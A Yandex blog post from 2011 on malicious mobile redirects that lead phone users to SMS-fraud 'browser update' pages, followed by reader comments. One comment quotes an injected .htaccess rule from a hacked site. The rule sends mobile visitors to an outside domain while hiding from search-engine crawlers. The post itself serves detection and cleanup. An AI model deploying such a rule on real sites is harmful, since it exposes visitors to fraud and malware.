Блог Яндекса для вебмастеров

Вредоносные мобильные редиректы

23 декабря 2011, 13:06

Всё больше людей пользуются мобильными устройствами и мобильным интернетом. Эта часть интернета стала привлекательной не только для вебмастеров, но и для злоумышленников.

 

Наша система обнаружения вредоносного кода выявила в мобильном интернете большое количество мобильных редиректов. Эти редиректы автоматически срабатывают, если пользователь зашел на сайт с мобильного телефона или планшета. Они перенаправляют посетителей на сайты с вредоносным или мошенническим ПО для мобильных устройств.

Яндекс считает, что подобные сайты с автоматическими редиректами (дорвеи) не представляют информационной ценности и не нужны в результатах поиска. Кроме того браузеры, использующие Safe Browsing API, и антивирусы предупреждают пользователя об опасности, если редирект ведет на зараженный сайт. В результате трафик на такие сайты уменьшается на несколько порядков.

Мы настоятельно не рекомендуем вебмастерам размещать на своих сайтах мобильные редиректы, а также вступать в партнёрские сети, которые предлагают «монетизировать» мобильный трафик за счёт размещения редиректов, например, на www.elitepay.ru.

 

Подробнее о мобильных редиректах

Мобильные редиректы работают следующим образом. Вебмастер, например, вступает в партнёрскую сеть и размещает на страницах сайта код, который срабатывает только при заходе на сайт с мобильного устройства и перенаправляет пользователя на сайт с вредоносным ПО. За каждый переход вебмастеру обещают начислять деньги.

Пользователь попадает на вредоносный сайт, и его перенаправляют на страницу с предложением установить какую-то программу. Например, обновить мобильный браузер Opera Mini. Для загрузки обновления сайт требует, чтобы пользователь отправил SMS за несколько десятков рублей, при том, что мобильный браузер распространяется вообще бесплатно. Если пользователь платит и устанавливает «обновлённую» программу, такие SMS дальше начинают отправляться автоматически, без согласия владельца телефона.

В зависимости от браузера, через который пришёл пользователь, сайты предлагают загрузить файлы с разными расширениями. Например, apk-файл для устройств на платформе Android, jar-файл для платформы J2ME. Кроме того, некоторые сайты перенаправляют пользователей iPhone, iPod и iPad на страницу установки специального дорогого ipa-приложения — сайт якобы можно просматривать только с помощью него. А на самом деле для просмотра подойдёт любой браузер, а сам сайт не содержит никакой полезной информации.

Как избавиться от редиректа на сайте

Если Яндекс обнаружил на вашем сайте код мобильного редиректа, вам придёт уведомление и рекомендации по его удалению. Обратите внимание: Яндекс никогда не попросит вас сообщить какие-либо пароли или заплатить за помощь.

Проверить, установлен ли на вашем сайте мобильный редирект, можно и самостоятельно. Просто попробуйте зайти на него с различных мобильных устройств, подключенных к интернету.

Если на вашем сайте есть редирект, но вы не размещали его самостоятельно, то, скорее всего, сайт был взломан. В этом случае вам поможет эта статья.

Команда безопасного поиска Яндекса


 


60 комментариев
Подписаться на комментарии к посту

элитпэй негодует!

могли бы хоть ссылочку поставить...

Я на одном сайте смотрю фильмы он лайн с компьютера . И решила попробовать зайти на страницу с мобильного. Нажав на окно там где должен быть фильм , началась загружаться айсикью. Благо что я не запустила ее а заранее посмотрела вес . 5 килобайт . ((( 

Сейчас мало кто пользуется мобильным интернетом - денег много уходит.

100 рублей в месяц полный безлимит в Самаре допустим. Не такие уж и большие деньги)

200 руб в мск анлим мтс/билайн.

Бред, если 100-300 руб для вас много, то да, много...

с той скоростью что дают за эти деньги это не интернет, а пронография и пользоваться им издеваться над собой

нормальное качество стоит от 9000 руб :)

На форумах партнерок развелось мобильных немерянно, так что вполне предсказуемый результат

http://sickboy.ru/mysli-vslux/elite-pay-govnopartnerka-pod-mobilnyjj-traffik-moya-recenziya-posle-dnya-raboty.html - А я про это давно писал! Вот нихрена же не верят... 

И че ты эту ссылку сюда кинул? в посте ты жалуешься на то, что они тебе мало выплачивали, а не на то, что они людей кидали

Сайты на которых обнаружен такой редирект исключаются из общей выдачи или только из мобильного поиска?

Да и спорно всё очень. Многие используют подобные редиректы для перенаправления мобильных пользователей на оптимизированный вариант сайта.
Разумеется, Яндекс отличает мобильные дорвеи от редиректов на версии сайтов, оптимизированные для просмотра на мобильных устройствах.
И вообще Яндекс - зеркало рунета или его цензор? ;)

уже давно к сожалению или к счастью цензор...

Лучше б с порнухой так воевали =)

Я логики понять не могу. Если к примеру СДЛ вступил в такую портнерку (ну или просто классный сайт (например предположу невероятное - Вести.ру)) то по логике Яши его значит надо под фильтр.

А то что сайты с порнухой кроме растления малолеток (типа ролики с названиями "сын ебет сестру и маму") заразу для компа всякую распространяют это нормально, так чтоли?

По мне нужно монетизаторы вап трафа оставить, а вот на порно сайты 100% бан наложить (знаю что многие со мной не согласяться, но я выссказался и это мое ИМХО)

Порно это искуство ))

Бороться нужно с ДП и вирусами, к остальному нужно относиться нейтрально. :)

 

Яндекс не цензор. Мы просто отвечаем на вопросы пользователей. Дорвеи не отвечают ни на какие вопросы пользователей, поэтому мы не включаем их в результаты поиска.

Александр, нам как рядовым пользователям и вебмастерам виднее. :))

Я не хочу сказать что данное нововедение плохо, если редиректы ведут на вирусы, этому нужно припятствовать, но именно вы (Яндекс) в данной ситуации являетесь как не крути, цензором. По сути дела бороться такими вопросами должны антивирусы, они за это деньги получают...

т.е баниться будут только дорвеи? А белые, качественные сайты, отправляющие мобильных пользователей на такие партнерки могут спать спокойно?

Белые качественные сайты подсовывающие людям вирусы должны спать спокойно?

Сайтов куева туча, если половину вредоностных забанить - вторая половина, которая не кидала пользователей на вирусы - получит вполне заслуженный траф! все честно!

 

Нормальные белые сайты не будут слать юзеров на ГС, особенно с вирусней и алярмами! Ссылка в тему: Web-монетизация мобильного трафика: выжимка всех соков с сайта.

Выводилась бы реклама и в моб.версиях и проблем бы небыло. (вроде слышал, что гугл партнерку для вап трафика какую-то делает или сделал.)

А так к примеру у меня 10000к посещалка из них 1к с телефона.Естесственно, что соблазн пытаться че-то с этим трафом делать велик.

ИМХО нужна нормальная партнерка для вап.трафа. чтоб и юзер поподал туда, куда надо и копеечку оставлял.

А кстати, есть ли рич-партнерки для мобильных версий?

 

Так я чет не понял - вы выкидывает сайты только из мобильного поиска или "пинаете по полной"?

Какие Дорвеи если не мобильный юзер видет нормальный сайт с нормальным контентом?

 

хорошие дорвеи отвечают на вопросы пользователей :D

А если редирект ведет на поддомен сайта, который представляет из себя мобильную версию?

О, а меня сегодня как раз товарищ из elitepay.ru агитировал :-)

Недавно получил от elitepay письмо с предложением участвовать в мобильной ПП. Хорошо что отказался!

Здраствуйте, у меня к вам такой вопрос. В общем есть сайт - крупный портал мобильной тематики. Допустим юзер приходит с поисковика на страницу с каким-нибудь приложением, читает обзор оного, смотрит картинки и потом хочет скачать данное приложение на свой мобильный телефон. Постоянный (зарегистрированный) пользователь получает ссылку на скачивание файла, а если посетитель не зарегистрирован на сайте - ему отдаётся ссылка на скачивание приложения только после того, как он оплатит доступ к нему. О том, что за доступ к контенту нужно заплатить юзера уведомляют ДВАЖДЫ - первый раз на сайте (на странице с приложением), а второй раз уже в самом приложении. То бишь оплата идёт лишь после принятия пользовательского соглашения. Никаких редиректов при этом не используется. Я считаю, что это полностью законно и справедливо чисто по человечески - пользователь после оплаты получает полностью рабочий установщик приложения, а не пустышку. Хотелось бы увидеть (услышать/прочитать) ваше мнение. Спасибо. 

Это, батенька, будет АГС. Проверено и перепроверено. Хотя - я даже не в обиде на Яшу, ибо - нефти заработано было весьма много, даже - много больше, чем много.
ЗЫ. А вот про рабочий установщик - вы б б-га не гневили, не хорошо говорить неправду, ибо - мы то с вами знаем - что там за приложение то o_O 

Нет пока модули партнерок не трогают!

Ну вот и ответ! А я все думал у себя мобильный трафик монетизровать, да что-то удерживало!

спасибо вам большое! банить все эти сайты! обманывают людей редерикт идет на скачивание несуществующих программ и прочее мошенничество. 

Чем бы дитя не тешилось, лишь бы не плакало...

Займитесь лучше поиском - Яндекс все же поисковик как никак.

А пока Яндекс ищет, Google находит.

Зашел как-то с мобильного телефона в интернет, выскочило окошко, типа срочно обновите оперу, ну я "обновил" себе оперу на 100 руб.

Кстати опрераторы отказались мне помочь чем либо в данной ситуации.

Вот статья о сути покупки и продажи мобильного трафика.

Надо срочно прикрывать эту лавочку. 

Мои операторы МТС и Мегафон по моей просьбе запретили все автоматическтие подписки на всех номерах

Яндекс ни с кем не борется, он как обычно тупо пиарится!

такие партнерки как WapConverter.ru и MoneySyst.ru продолжают и дальше успешно работать, сливая трафик на всякий хлам на подобии Оперы или прочей хрени

 

более того еще и в своих топиках обсуждают как обойти Яндекс чтобы тот не запалил

forum.searchengines.ru/showthread.php?t=679984&highlight=%D1%8F%D0%BD%D0%B4%D0%B5%D0%BA%D1%81&page=29

проверил один сайт с андроида, айфона и айпада грузится нормально, а когда заходишь с виндоузфон через интернет эксплорер появляется эта опера, что это может быть?

а если я установлю редирект для собственного сайта на поддомен своего сайта на котором стоит мобильная версия моего сайта?

Маяковцев Вальдемар
28 февраля 2012, 23:01

Мобильные редиректы не нужны. Такую ссылку можно было поставить :-) Сам недавно пару раз такой спам присылали на телефон, зашел с ПК — перенаправление на файл мидлета (Java) — сдал в арбуз хостера.

скажите, а куда писать. после того как редирект убрал, а то в яндексе до сих пор пишет страница под угрозой.. хотя уже почистил все

fotostrana-pitomec
12 мая 2012, 08:58

в вебмастерской Яндекса

 Решение проблемы редиректа (вируса) Сам вымучался проблемой редиректа, а то Яндекс записал в недруги и красная лисица искоса смотрит.

Материал про редирект мобильный: скрипт обновление flash плеера

 

оттуда: 

Как ни странно, приведенный ниже вредоносный код на данный момент (23.08.2012) не замечает ни один сервис для определения вирусов на сайте, а также Яндекс.Вебмастер и инструменты Google для вебмастеров. 

 

Всё прекрасно,всё замечательно.Но здесь есть одно Но!Уважаемая команда безопасного поиска Яндекса.Вот вы сколько ни говорите про безопасности поиска,всё равно как раз через поисковик Яндекса в отличии от Google попадаешь на самые разнообразные мошеннические сайты со всевозможными редиректами.Я не знаю с чем это связано,но согласитесь слова нужно превращать в дело.

Может кому-то поможет!  Сайт попал в зараженные оказалось взломали файл .htaccess добавили редирект на http://pubmob.ru/:

RewriteCond    %{HTTP_USER_AGENT}  (android|midp|j2me|symbian|series\ 60|symbos|windows\ mobile|windows\ ce|ppc|smartphone|blackberry|mtk|windows\ phone)  [NC]
RewriteCond    %{HTTP_USER_AGENT}  !(accoona|ia_archiver|antabot|ask\ jeeves|baidu|dcpbot|eltaindexer|feedfetcher|gamespy|gigabot|googlebot|gsa-crawler|grub-client|gulper|slurp|mihalism|msnbot|worldindexer|ooyyo|pagebull|scooter|w3c_validator|jigsaw|webalta|yahoofeedseeker|yahoo!\ slurp|mmcrawler|yandexbot|yandeximages|yandexvideo|yandexmedia|yandexblogs|yandexaddurl|yandexfavicons|yandexdirect|yandexmetrika|yandexcatalog|yandexnews|yandeximageresizer)    [NC]
RewriteRule    (.*)    http://pubmob.ru/inc/?red   [L,R=302]

И у меня такое раз было, а еще был заражен файл php.ini - это уже в другой раз...

у меня сайт, на котором  уже 4 раза! якобы был обнаружен вредоносный код, сайт проверен, перепроверен, не взломан и т.д. после сообщения яшки о том, что у меня ВК, я прошу перепроверить еще раз, и каждый раз выясняется, что КОД НЕ ОБНАРУЖЕН....

Захожу на сайт с разных мобильников, с планшета, никуда не редиректит...

Несколько раз писал в слубу тех. подержки яндекса, но там  сидит дядя робот и ему похрену, что у тебя и как...

знай себе толдычит, алгоритм да алгоритм..

 

а мне ответили что в первый раз обнаружен мобильный редирект, но сейчас все чисто.
через некоторое время опять.
зашел с планшета выкинуло на обновление флэши на flash-ox.com
все перерыл - не пойму что редиректит. в панели хостинга - нету редиректов, в коде страничек тоже нету, htaccess "чистый"
эх

У меня тоже что-то подобное. Сайт уже в .... Слетел с первых позиций в поиске по ключевым совам, трафик упал вдвое, в WOT с темно-зеленой со звездочкой слетел на желтую. А яндекс перепроверку не делает уже неделю после того, как я запросил.

Дважды Яндекс находил такие проблемы у меня - дважды был прав... Дважды проходилось раскапывать хитрые ридиректы. Плохо, что до окончания перепроверки сайт идет с "черной меткой" и для пользователей интернета с обычных PC...

Весьма неприятно было увидеть предупреждение, что мой сайт-кормилец, РПК Результат, представляет угрозу для всякого, кто решит заказать у нас вывеску! А ведь на нашем сайте нет никакой рекламы - бережём нервы своих заказчиков, делаем всё, чтобы они не отвлекались на несущественное. Оказалось, что недавно размещённый скрипт социальных кнопок, распространяемый сайтом "Одна кнопка" сыграл с нами такую шутку...Четыре дня Яндекс "резал" наших потенциальных заказчиков. Итог - недополучение прибыли, которые и без того никакие.... 

Удивляет вот что: почему тот же Яндекс не предупредил меня, что этот скрипт(а брал я его с официального сайта, а не у партнёра) может характеризоваться как потенциальная угроза...

Аналогично, скрипт с сайта odnaknopka.ru - оказался зловредом!!!

Реальное спасибо Яндексу.

Именно настойчивое предупреждение помогло найти джумла-модуль который перенаправлял на "ОБНОВЛЕНИЕ ФЛЭШ ПЛЭЙЕРА".

А я всё игнорировал. И при этом удивлялся и чего меня мой сайт перекидывает на обновление флэша. Ведь я в андроид установил к прошивке нормальный флэш...

 

А решил просто - C-Panel хостинга имеет антивирусный сканер. Вот он-то и показал, что загажено.

 Или пользуйтесь скриптом проверки

dima-chizhikov2009
16 января 2014, 14:21

Ну, или допустим, поговорим про платные подписки. Допустим, с оперы заходишь на нормальный музыкальный сайт, допустим с билайновской симки, и тут тебя перенаправляют на какой то платный сайт для оформления подписки. Я стараюсь сидеть через вай-фай,а не через билайновский инет.

Все мобильные редиректы ведут к понижению сайта в выдаче, или есть белые и черные ?

Сячина Ольга
15 декабря 2016, 14:51
Мой сайт не так давно зафильтровали как дорвей. Самое интересное, что никаких редиректов и перенаправлений на нем нет и не было. Сайт молодой, от роду месяц. Уникальный контент, писался нормальным, грамотным копирайтером.


После долгой переписки с Платонами - получаю в конце концов ответ: 


"Здравствуйте, Ольга!
В скором времени Ваш сайт должен начать индексироваться, а затем его страницы смогут появиться в поиске. Скорее всего, это произойдет в течение двух недель.
Однако, после анализа Вашего сайта мы пришли к выводу, что он не соответствует нашему представлению о качественных сайтах, отраженному в наших рекомендациях https://yandex.ru/support/webmaster/yandex-indexing/webmaster-advice.xml .
На решение алгоритма могло повлиять множество факторов, таких как отсутствие оригинального и интересного контента, наличие списков поисковых запросов, использование SEO-ссылок, чрезмерное использование рекламы и другие.
Мы стараемся настраивать и улучшать алгоритмы поиска так, чтобы сайты, соответствующие этим рекомендациями, быстро и полно индексировались и находились на высоких позициях по релевантным запросам.
Если Вы будете развивать сайт для пользователей, размещать уникальную и полезную информацию и следовать нашим рекомендациям, то со временем его позиции в результатах поиска смогут улучшиться."


Короче говоря, теперь сайт не дорвей, дорвейный фильтр сняли. Но наложили сразу же другой - "Малополезный контент, спам, избыток рекламы"


Рекламы на сайте нет, малополезным контент назвать ну никак нельзя - каждая статья отвечает на конкретный вопрос пользователя, грамотно написана, уникальна.  Спамом не занимаюсь, максимум три раза ключ повторяется в статье. При этом статьи от 2000 до 5000 знаков, не маленькие. 


Фильтр не снимают уже месяц. За что - не могу понять. То оно, то другое...